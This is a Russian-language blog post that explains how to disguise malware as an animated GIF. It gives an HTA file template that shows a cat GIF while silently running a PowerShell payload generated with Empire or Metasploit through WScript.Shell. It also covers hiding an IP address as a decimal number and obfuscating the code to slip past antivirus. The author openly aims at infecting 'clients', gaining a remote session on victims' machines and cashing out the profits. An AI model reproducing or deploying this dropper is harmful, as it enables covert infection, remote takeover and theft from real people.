About Teletype
Join
S
@slivmens2
November 19, 2019

Вшиваем вирус в GIF

Нашел для вас метод заражения наших с вами "любимых клиентов". Все будет, как Мы любим: весело, легко и скрытно)

Поехали!

Гифка была выбрана эта, остается разобраться с кодом:

Для начала генерируем powershell в Empire или Metasploit

я выбрал ..

>>>КОД СКРИПТА<<<

  1. <html>
  2. <head>
  3. <title>NazvanieGif</title>
  4. <hta:application id="NazvanieGif"
  5. border="thin"
  6. borderstyle="complex"
  7. maximizeButton="no"
  8. minimizeButton="no"
  9. />
  11. </head>
  13. <script type="text/javascript">
  15. var index = -1;
  16. var images = [
  17. "data:image/gif;base64,"];
  20. function initGallery(){
  21. window.resizeTo(300,300);
  22. htaPayload();
  23. nextPicture();
  24. }
  26. function nextPicture(){
  27. var img;
  28. index = index + 1;
  29. if (index > images.length -1 ){
  30. index = 0;
  31. }
  32. img = document.getElementById("gallery");
  33. img.src = images[index];
  34. }
  36. function htaPayload(){
  37. var payload="";
  38. try{
  39. if (navigator.userAgent.indexOf("Windows") !== -1){
  40. new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);
  41. }
  42. }
  43. catch(e){
  44. }
  45. }
  47. </script>
  49. <style>
  51. #gallery, div {
  52. width: 100%;
  53. height: 100%;
  54. }
  56. #outer {
  57. text-align: center;
  58. }
  60. #inner{
  61. display: inline-block;
  62. }
  64. body {
  65. background-color: black;
  66. }
  68. </style>
  69. <body onload="initGallery()">
  70. <div id="outer">
  71. <div id="inner">
  72. <img id="gallery" onclick="nextPicture()">
  73. </div>
  74. </div>
  75. </body>
  76. </html>

и вставляем в 37 строчку между:

Далее переходим на очень полезный онлайн ресурс

Иногда он выручает для различного рода задач, например, при кодировке IP адреса в бинарник для последующего его скрытия.

Немножечко отступлю от темы покажу: например скрываем 127.0.0.1

127 = 1111111, 0 = 0 и 1 = 1 преобразовываем точки и получаем 01111111000000000000000000000001 = 2130706433 ИТОГ http: // 2130706433

Такти образом переводим нашу GIF-ку в формат base64, копируем полученную кодировочку и вставляем в

Как видите в 17 строку)


Осталось последнее действие конвертировать, а точнее обфусцировать, то есть спрятать вредный код от антивирусов в этой замечательной программе

Сохраняем полученный код в блокноте, под любым именем, но в формате .hta

Заключение: При запуске у жертвы появится Ваша злая GIF-ka c котиком, а к Вам прилетит заветная сессия)

А деньги с профита можно безопасно вывести через...

@slivmens2
November 19, 2019, 20:24
0 reactions
0 views